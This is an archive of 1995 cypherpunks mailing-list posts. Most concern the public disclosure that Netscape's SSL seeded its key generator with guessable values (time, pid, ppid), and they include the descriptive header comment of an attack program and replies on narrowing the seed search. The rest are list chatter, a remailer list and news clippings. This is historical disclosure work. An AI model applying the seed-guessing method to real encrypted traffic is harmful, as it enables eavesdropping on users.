> A little more than 5 seconds, but I believe that captures her inflection
> pretty nicely, don't you think?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 17 Sep 95 18:19:52 PDT
To: s675570@aix2.uottawa.ca
Subject: Re: Joe Sixpack and his TV
In-Reply-To: <Pine.3.89.9509172041.B83388-0100000@aix2.uottawa.ca>
Message-ID: <Pine.SUN.3.91.950917211934.20712A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Sep 1995 s675570@aix2.uottawa.ca wrote:

> If Mr. & Mrs J. Sixpack seem to know zilch at present about strong or any 
> other other kind of crypto, would it maybe, possibly have to do with a lack
> of exposure to it on the soap operas of their favorite media, ie TV? Hmmm.
> 
> The general level of paranoia on X-Files (100 milion viewers all over the 
> world, rabid internet following) is even higher than on this list, and 
> the usual discussions on this list would read like a free vacation to their
> scriptwriters and researchers. Anyone have any scriptwriting skills?
> 100 million potential subscribers to toad are stake... (Yes I guess then
> we'd have to move to usenet distribution. But think how entertaining our
> flames wars would become. Yes I'm definitely calling for it, and the big 
> house with the hot tub would be nice too. Only half joking. Honestly though, 
> anyone want to find out their email addreses and send out a gratis 
> subscription to toad? A script would be nice too. It's better exposure 
> than five seconds of Tim with Connie Chung.)
> 


As I understand it shows like "The X-Files" don't accept unsolicited 
scripts.  Not surprising as I'm sure they have writer's agreements.

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@CS.Berkeley.EDU>
Date: Sun, 17 Sep 95 21:41:08 PDT
To: cypherpunks@toad.com
Subject: Netscape SSL implementation cracked!
Message-ID: <199509180441.VAA16683@lagos.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


As some of you may recall, a few weeks ago I posted a
reverse-compilation of the random number generation routine used by
netscape to choose challenge data and encryption keys.

Recently, one of my officemates (David Wagner <daw@cs.berkeley.edu>)
and I (Ian Goldberg <iang@cs.berkeley.edu>) finished the job
of seeing exactly how the encryption keys are picked.

What we discovered is that, at least on the systems we checked (Solaris
and HP-UX), the seed value for the RNG was fairly trivial to guess by
someone with an account on the machine running netscape (so much so
that in this situation, it usually takes less than 1 minute to find
the key), and not too hard for people without accounts, either.
See below for details.

I've included the header to a program we wrote to do this key-cracking
below.  I would like to get some information, though:

o Where should I put the full source (1 file, ~12k) so that ITAR lovers
  don't get mad at me?

o Where can I find a version of netscape that does RC4-128?  It is
  likely that it suffers from the same problem, and even a brute-force
  search of the entire seed space is _much_ less than 128 bits.

Happy hacking,

   - Ian "who just saw _Hackers_ today with some other Bay Area cypherpunks,
           and it put me in the mood"

/* unssl.c - Last update: 950917

   Break netscape's shoddy implementation of SSL on some platforms
   (tested for netscape running RC4-40 on Solaris and HP-UX; other
    Unices are probably similar; other crypt methods are unknown, but
    it is likely that RC4-128 will have the same problems).

   The idea is this: netscape seeds the random number generator it uses
   to produce challenge-data and master keys with a combination of the
   time in seconds and microseconds, the pid and the ppid.  Of these,
   only the microseconds is hard to determine by someone who
   (a) can watch your packets on the network and
   (b) has access to any account on the system running netscape.

   Even if (b) is not satisfied, the time can often be obtained from
   the time or daytime network daemons; an approximation to the pid can
   sometimes be obtained from a mail daemon (the pid is part of most
   Message-ID's); the ppid will usually be not much smaller than the pid,
   and has an higher than average chance of being 1.  Clever guessing
   of these values will in all likelihood cut the expected search space
   down to less than brute-forcing a 40-bit key, and certainly is less
   than brute-forcing a 128-bit key.

   Subsequent https: connections after the first (even to different hosts)
   seem to _not_ reseed the RNG.  This makes things much easier, once
   you've broken the first message.  Just keep generating 16 bytes of
   random numbers until you get the challenge-data for the next message.
   The next key will then be the 16 random bytes after that.

   main() and bits of MD5Transform1 by Ian Goldberg <iang@cs.berkeley.edu>
   and David Wagner <daw@cs.berkeley.edu>.  The rest is taken from the
   standard MD5 code; see below.

   This code seems to want to run on a big-endian machine.  There may be
   other problems as well.  This code is provided as-is; if it causes you
   to lose your data, sleep, civil liberties, or SO, that's your problem.

#include <std/disclaimer.h>

   On the command line, give the time in seconds, the pid, the ppid and
   the SSL challenge data (each byte in hex, separated by some non-hex
   character like a colon) of the _first_ SSL message generated by
   the instance of netscape.  This program will search through the
   microsecond values.  You may need to run it again with a slightly
   different value for the seconds, depending on how accurately you know
   the time on the system running netscape.  The output will be the
   master key (all 16 bytes; note you never even told the program the
   11 bytes you knew) and the value for the microseconds that produced it.

   As a benchmark, this code runs in just under 25 seconds real time
   (for an unsuccessful search through 1<<20 values for the microseconds)
   on an unloaded HP 712/80.
*/



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 17 Sep 95 22:15:27 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: Joe Sixpack and his TV
In-Reply-To: <Pine.SUN.3.91.950917211934.20712A-100000@polaris.mindport.net>
Message-ID: <Pine.SUN.3.91.950917220640.2823A-100000@crl2.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 17 Sep 1995, Black Unicorn wrote:

> As I understand it shows like "The X-Files" don't accept unsolicited 
> scripts.  Not surprising as I'm sure they have writer's agreements.

Nobody accepts unsolicited scripts for legal reasons.  The real 
question is, do they accept outside scripts?  Some shows do; some
shows don't.  IF they do, they will send freelance writers a show
"bible," which is a writer's guide to the basic rules concerning
the structure, history, characters, etc. of the show.  If you're
interested, you should drop them a note asking in they accept
scripts from outsiders.  Giving the production offices a call
would let you know what their attitude is about submissions.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Sun, 17 Sep 95 15:40:13 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: "Attachments"
In-Reply-To: <ac81e3df200210046fa3@[205.199.118.202]>
Message-ID: <m0suSN5-000LcjC@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


> Why do people keep sending "attachments"?
> 
> This was just a text article, and not an application (program), so why was
> it included as an "attachment"?

It wasn't.  It was a monopart MIME message of type application/pgp.
Check your mailer config.
-- 
Shields.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sal@panix.com (Sal Denaro)
Date: Mon, 18 Sep 95 21:30:20 PDT
To: Ray Arachelian <sunder@amanda.dorsai.org>
Subject: Re: AOL monitoring
In-Reply-To: <Pine.SUN.3.91.950917113021.11534E@amanda.dorsai.org>
Message-ID: <+3OXwAgbBgzR084yn@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.SUN.3.91.950917113021.11534E@amanda.dorsai.org>, you wrote:
> A further hint as to why this won't work:  the client software doesn't 
> keep track of which messages you've read in a discussion area, AOL's 
> server's do.  How do I know this?  Because I use AOL on a Mac from home, 

Ohhh-God, not again...

Can anyone remember the Prodigy rumor? How IBM was snooping around
your hard disk, and it turned out to be nothing but a swapfile. Does
"Good times" ring a bell? And don't get me started on MicroSoft 
Network rumors...

1) 90% of the FTP sites I use mention that they log xfers.

2) My .newsrc file can tell anyone that I read alt.hackers and alt.2600

3) My address book shows who I send mail often enough to warrent me
   putting in a nickname.

4) My sent-mail folder shows who I sent mail to in the past year.

5) My bookmark file shows that I read the NYC-Speedtraps page one or
   two time a week.

I am sure that AOL, Prodigy, CompuServe and Acme Internet all log what 
mail/news/web pages/ftp sites you have visited, in one way or another.
Does this bother me? A little. I use a local Internet provider with
an OS I understand enough to know what is logged and what is not logged.
My fear is not LEA, but crackers. As long as I make myself a hard
target- they vultures will look elseware. I repeat this like a mantra 
yet no one belives me- IF YOU WANT PRIVACY, DON'T USE THE PHONE. Once 
the headset is raised, big brother is online. If you do not like those
rules, don't play the game.

--
Salvatore Denaro		
sal@panix.com             I waited for the joke/It never did arrive.
Yes, I use PGP         Words I thought I'd choke/I hardly recognize.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <klp@gold.tc.umn.edu>
Date: Sun, 17 Sep 95 22:27:32 PDT
To: iang@CS.Berkeley.EDU (Ian Goldberg)
Subject: Re: Netscape SSL implementation cracked!
In-Reply-To: <199509180441.VAA16683@lagos.CS.Berkeley.EDU>
Message-ID: <305d030d0527002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


A little birdie told me that Ian Goldberg said:
> 
> As some of you may recall, a few weeks ago I posted a
> reverse-compilation of the random number generation routine used by
> netscape to choose challenge data and encryption keys.
> 
> Recently, one of my officemates (David Wagner <daw@cs.berkeley.edu>)
> and I (Ian Goldberg <iang@cs.berkeley.edu>) finished the job
> of seeing exactly how the encryption keys are picked.
> 
> What we discovered is that, at least on the systems we checked (Solaris
> and HP-UX), the seed value for the RNG was fairly trivial to guess by
> someone with an account on the machine running netscape (so much so
> that in this situation, it usually takes less than 1 minute to find
> the key), and not too hard for people without accounts, either.

Makes one wonder what the seed is on a Windows implementation...
If it's only the time, you can probably approximate what the
clock is set to within a couple of minutes (if the timezone of the
client is known). 

-- 
Kevin Prigge                        |  Holes in whats left of my reason, 
CIS Consultant                      |  holes in the knees of my blues,
Computer & Information Services     |  odds against me been increasin' 
email: klp@cis.umn.edu              |  but I'll pull through...  



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Sun, 17 Sep 95 22:42:15 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape SSL implementation cracked!
In-Reply-To: <305d030d0527002@noc.cis.umn.edu>
Message-ID: <m0suYvx-00063jC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text


Kevin L Prigge wrote:
 
 A little birdie told me that Ian Goldberg said:

 > What we discovered is that, at least on the systems we checked (Solaris
 > and HP-UX), the seed value for the RNG was fairly trivial to guess by
 > someone with an account on the machine running netscape (so much so
 > that in this situation, it usually takes less than 1 minute to find
 > the key), and not too hard for people without accounts, either.
 
/ Makes one wonder what the seed is on a Windows implementation...
/ If it's only the time, you can probably approximate what the
/ clock is set to within a couple of minutes (if the timezone of the
/ client is known). 
 
Hah! Like a Cmos clock can *ever* keep a consistant time for more than
two minutes...
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 17 Sep 95 22:09:52 PDT
To: Ian Goldberg <iang@CS.Berkeley.EDU>
Subject: Re: Netscape SSL implementation cracked!
In-Reply-To: <199509180441.VAA16683@lagos.CS.Berkeley.EDU>
Message-ID: <Pine.SUN.3.91.950918011024.24473A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




Excellent work!



---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 17 Sep 95 22:27:10 PDT
To: Ian Goldberg <iang@cs.berkeley.edu>
Subject: Re: Netscape SSL implementation cracked!
In-Reply-To: <199509180441.VAA16683@lagos.CS.Berkeley.EDU>
Message-ID: <199509180527.BAA28782@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Ian Goldberg writes:
> What we discovered is that, at least on the systems we checked (Solaris
> and HP-UX), the seed value for the RNG was fairly trivial to guess by
> someone with an account on the machine running netscape (so much so
> that in this situation, it usually takes less than 1 minute to find
> the key), and not too hard for people without accounts, either.
> See below for details.

Why is this completely unsuprising?

I've said it before and I'll say it again -- Netscape's programmers
(with a few notable exceptions -- you know who you are) tend to be
sloppy about security critical details.  Experience with most of the
same people from back when they built Mosaic shows that they just
don't get the details right. (I wonder how many buffer overflow
security bugs lurk in Netscape waiting to be found. I wonder how many
such bugs lurk in their web servers, too...)

Anyway, congratulations to you and Dave on an excellent piece of
work. I say a bunch of us should buy you "I broke Netscape's security
and all I got was this lousy T-Shirt" shirts, if only someone would
design them!

(Two of those should be given to our friends in the U.K. and at INRIA
who brute forced Netscape before. A dozen more of the shirts should be
held for future breaks -- which are a "when", not an "if".)

> I've included the header to a program we wrote to do this key-cracking
> below.  I would like to get some information, though:
> 
> o Where should I put the full source (1 file, ~12k) so that ITAR lovers
>   don't get mad at me?

Give it to the folks at ftp.csua.berkeley.edu, I say.

> o Where can I find a version of netscape that does RC4-128?  It is
>   likely that it suffers from the same problem, and even a brute-force
>   search of the entire seed space is _much_ less than 128 bits.

They sell it in stores.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 17 Sep 95 22:30:10 PDT
To: Christian Wettergren <cwe@it.kth.se>
Subject: Re: Netscape SSL implementation is broken!
In-Reply-To: <199509180525.HAA06519@piraya.electrum.kth.se>
Message-ID: <199509180529.BAA28806@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Christian Wettergren writes:
> I guess we should send them the draft-ietf-security-randomness-00.txt
> asap.

I thought that was an RFC by now.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: acollier@crl.com
Date: Sun, 17 Sep 95 18:59:49 PDT
To: cypherpunks@toad.com
Subject: Re: FAX Encryption Software
In-Reply-To: <43hvft$n2b@news1.deltanet.com>
Message-ID: <43ii1t$210@nntp.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


clav@deltanet.com wrote:

>ANYONE FOR A CRYPTO-STRONG, YET EASY TO USE FAX/EMAIL SECURITY 
>SOFTWARE PACKAGE FOR BUSINESS OR OTHER USE???

>Aliroo Ltd. has developed a Windows, eye-to-eye fax/email 
>encryption package called PrivaSoft.

>Unlike any previously devised system, this method protects, with 
>only 4 mouse clicks, fax and email transmissions in electronic 
>and even paper form - FROM THE TIME YOU CREATE A MESSAGE UNTIL IT 
>IS READ - NOT JUST WHEN YOUR FAX IS BEING TRANSMITTED. 

>You can encrypt a message, and then fax or email it (via plain 
>old standard fax machine or fax modem), print it to paper or save 
>to a disk file.

>It is fully licensed, without restriction for export, by the U.S. 
>Department of Commerce. NO PGP WORRIES.

Also no worries about security - if DOC says you can have it, you can bet
that NSA has seen to it that it is cryptographically weak, or else uses a
key escrow system (where sombody else can get to the keys), and as insecure
as any other non-published method.  For all we know, they may be using a
cereal box decoder ring set up.

>Email me for a free copy which will be sent to you via email or 
>snail mail post. It is fully functional (not crippleware) and 
>enables you to try our system out before purchase with 8 free 
>page scrambles. It retails for $130 per installed computer. 
>Looking for end users and distributors.

>Thanks,
>David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jis@mit.edu (Jeffrey I. Schiller)
Date: Sun, 17 Sep 95 23:34:08 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape SSL implementation cracked!
Message-ID: <ac82c28b000210042af3@[18.162.1.1]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Makes one wonder what the seed is on a Windows implementation...
>If it's only the time, you can probably approximate what the
>clock is set to within a couple of minutes (if the timezone of the
>client is known).

Who cares what the timezone of the client is. Try searching around in all
24 timezones. The trick with predicting a random number generator isn't
that you have to get the exact key, you just have to narrow the search
space to something reasonable. A couple of minutes times 24 isn't that bad!

                                -Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMF0SvMUtR20Nv5BtAQEAVQP/ccPp8IM8dnGtdDTajjO1a0sYBo7u7LcB
yracUhWnE6h90DEtEbGHpEUz3UpvMrXVTC1cFYXml8v3zH4DKlgXyIwC1kItAbqB
9NJTtvB1D5Msnoslqkn+ZoP2K8i0ajcHcXlqma32YiQJM6D4KSxFtRgM7vawCVuy
KqnbrdSrQQQ=
=bYf5
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Sun, 17 Sep 95 18:57:46 PDT
To: cypherpunks@toad.com
Subject: Anonymous WWW proxy Alpha release available
Message-ID: <9509180157.AA13253@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

If you are interested, the first (alpha) version of my anonymous httpd
proxy is available  see htpp://hplyot.obspm.fr:6661/ (where it runs,
unless it dies meanwhile, then see
htpp://hplyot.obspm.fr/~dl/wwwtools.html  oor mail me)

Ok, what does it do more than cern's :

  + It's single process, light, and mostly multi-tasking
  + It removes all nasty 'personal' infos like user-agent, referer,...
  + If there is an "ProxyControl: V1 <proxy-list>" in the header,
    it will send the request to first the the first proxy listed
    in the list and sending to that one a "ProxyControl: V1
    <rest-of-proxy-list>" header
  + If you launch your personnal copy of the AnonProxyHttp with
    arguments  "port 2 ph1:pp1 ph2:pp2 ph3:pp3" and 
    setenv http_proxy http://localhost:port/
    accessing the web now goes through your AnonProxy, which randomly
    creates a route to your url going through 2 of the 3 specified
    other AnonProxy

What will come when i'll have some time :
  
  + more flexibility in the spec of the other AnonProxies and
    a centralized and/or distributed catalog of availble proxies

What I need folks for :

  + get it and run it (and debug?), so we could chain them :-)

What is the big catch/problem :

  + its written in .... Tcl + tcl-dp + tclX !
    (plz don't flame me...)
    so you need a tcl-dp+tclX interp to try it locally...

Feedback  / Comments / ... welcome
Regards
dl

- -- 
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAgUBMFzRIXk52/beodHxAQFGzAP+Kl4ImRpuYIjSk7rtEjGIoPVSv1d1j6sq
9GIgmFgRLSyiw2LcYzlFNxtEOqAjM2k+rJttHxavKOJb+eeAzqZP7ihWHfBv8FS3
56SiCw16h2OPsEeZ4TOkUmMTEGDWHJKN9tfVac4qpuG1LZ7A2RejMAUV9qp02LNg
Vch5aDWlPNc=
=AvS/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Mon, 18 Sep 95 02:29:53 PDT
To: cypherpunks@toad.com
Subject: Jill Sixpack wants to know?
Message-ID: <199509180929.CAA12683@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Is the cracking of Netscape SSL the equivalant of lockpicking,
as opposed to the keycracking stuff we did (making a key).

And further, we can do it rather fast, like in minutes?

I just want to make sure I explain it to Jill Sixpack correctly. OK!
KEWLNESS!

Love Always,

Carol Anne
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 18 Sep 95 06:50:41 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199509181350.GAA01202@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ncognito"} = "<ncognito@gate.net> cpunk";
$remailer{"precip"} = "<mixmaster@mix.precipice.com> cpunk mix pgp hash latent cut ek reord";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

News: the remailer list has been rewritten, and the new version is
live! It should be more accurate, reliable, and faster than before.

Penet is back up! Enjoy.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
ford     remailer@bi-node.zerberus.de     -**-**++*--*  1:29:00 100.00%
crown    mixmaster@kether.alias.net       -----++--+++    51:47  99.99%
syrinx   syrinx@c2.org                    +++-+++-++++    41:46  99.99%
hroller  hroller@c2.org                   ******+#####     1:06  99.99%
precip   mixmaster@mix.precipice.com         +-++-+.--  6:12:30  99.98%
bsu-cs   nowhere@bsu-cs.bsu.edu           ++*+--_**#+#    16:52  99.98%
robo     robo@c2.org                      ******+##*##     1:07  99.97%
spook    remailer@spook.alias.net         -----------   2:16:14  99.95%
alumni   hal@alumni.caltech.edu           *** **+*+###     3:07  99.93%
portal   hfinney@shell.portal.com         +* *** #+###     3:08  99.81%
hacktic  remailer@utopia.hacktic.nl       ****** ++***    10:42  99.68%
rmadillo remailer@armadillo.com           ++++++++++ +    39:26  99.57%
replay   remailer@replay.com              *****  ++***     7:28  99.55%
flame    remailer@flame.alias.net          +*+++ ++***    27:46  99.42%
vishnu   mixmaster@vishnu.alias.net       --+*-  +++-+  1:36:19  99.29%
mix      mixmaster@remail.obscura.com     ___.+--._. - 12:46:51  98.98%
ideath   remailer@ideath.goldenbear.com   -----.----+   5:04:07  98.43%
extropia remail@extropia.wimsey.com       -.---.-----   5:56:37  97.65%
c2       remail@c2.org                    ++++** *+ *     27:40  96.11%
penet                                             * ++  4:40:10  95.85%
rahul    homer@rahul.net                  ******+*#+##     2:18  99.99%
ncognito ncognito@gate.net                **+*+*-++        6:59  68.25%
gondolin mixmaster@gondolin.org           ---.--*--     3:11:17  67.07%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@robo.remailer
Date: Mon, 18 Sep 95 07:30:57 PDT
To: cypherpunks@toad.com
Subject: Code of Law
Message-ID: <199509181425.HAA13003@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Financial Times, Sept 18, 1995.

Code to deny the money launderer

The International Bar Association will this week call for
the establishment of a code of practice for lawyers
worldwide to deny criminals access to legal services
which facilitate money laundering.

At the IBA's business law conference in Paris, which
opens today, Professor Ross Harper, IBA president, will
ask representatives from 167 bar associations to pass a
motion supporting efforts to counter money laundering and
for the creation of common professional standards on the
issue.

"We are anxious that there be no safe havens for the
ill-gotten proceeds of criminal activities throughout the
world," he said yesterday. Estimates put the amount of
money laundered worldwide each year at more than 500
billion pounds. On such a scale it is possible for
economies, world trade and global banking to be subverted
by organised crime, the IBA says.

The motion urges member bar associations to press their
national governments to adopt the principal
recommendations of the Financial Action Task Force on
money laundering set up in 1989 by the Group of Seven
industrialised countries and the European Commission. 

Robert Rice, London

-----

Newsweek, Sept 25, 1995.

A Law of Their Own: Extremists create do-it-yourself
courts.

One day last month Wichita District Attorney Nola
Foulston looked at her copy of the Daily Record, a trade
newspaper, and was stunned to read that she had been
subpoenaed. She was ordered to appear in District Court
and produce her license to practice law. If she failed to
appear, the sheriff would be directed to arrest her. Her
alleged crime: holding public office. The subpoena was an
unofficial document drafted and filed by a local man who
had been charged with a misdemeanor for burning trash
without a permit. Angered by the government interference,
he joined a growing number of disgruntled Americans who
think they've found a better arbiter ofjustice. He went
to a "Common Law court, " one of the latest incarnations
of the extremist right. Foulston ignored the subpoena. "I
don't practice in false courts," she says.

But they're growing. Common Law courts have sprung up in
at least 11 states in the farm belt and the West over the
last year, organized by a cross section of people bent on
directly challenging government. In living rooms, bingo
halls and convention centers, dozens gather weekly to
form juries, present evidence and issue kangaroo-court
indictments, liens, arrest warrants -- and even death
sentences. None of this has the force of law.

The movement is based on a mixture of crackpot conspiracy
theories and bizarre interpretations of the U. S.
Constitution, the Bible and the Magna Charta. In brief,
its leaders preach that Franklin Delano Roosevelt's "bank
holiday" edict of 1933, which temporarily shut down the
nation's banks, stripped the country of its safeguards
against tyranny. "When you get to digging into what's
going on today, you have a government operating outside
the Constitution," says David Schechter, a court
organizer.

Court members keep in touch on the Internet, swapping
information, posting meetings and organizing court
sessions . They also vent their views in a Texas magazine
called the AntiShyster. Mostly white men form Common Law
courts; many come from the militia movement. Some are
closely aligned with white-supremacy and anti-Jewish
groups. "The basic idea behind the movement," says
University of Oregon history professor Richard Brown, "is
'popular sovereignty,' that people are above the law.
These people are alienated from the legal system. To some
extent it sounds like they're also trying to settle
personal scores."

Nuisance filings: At times, the movement spills out of
its bogus courts and into real ones. Followers have tied
up courts and IRS offices with thousands of pages of
nuisance filings. Common Law court "marshals" have even
burst into federal courtrooms wearing official-looking
badges and uniforms to serve their papers. Last year in
Garfield County, Mont., 36 men and women formed a Common
Law court and briefly occupied a courthouse. Another
court offered $1 million bounties for the arrest of local
officials and threatened to hang them. Garfield County
Attorney Nick Murnion charged some members of the Common
Law court with "criminal syndicalism," alleging that the
group had advocated acts of violence for political
purposes. One court member was sentenced to 10 years in
prison. Others received smaller sentences.

Some members try to use the rump courts to reverse real
ones. Favorite targets are divorce decrees and
foreclosure notices. "People who don't want to or can't
pay their bills are turning to something that tells them
they don't have to." says Kansas City attorney Berry F.
Laws III, who has been targeted by Common Law courts
because he forecloses on farm mortgages for the Farmers
Home Administration.

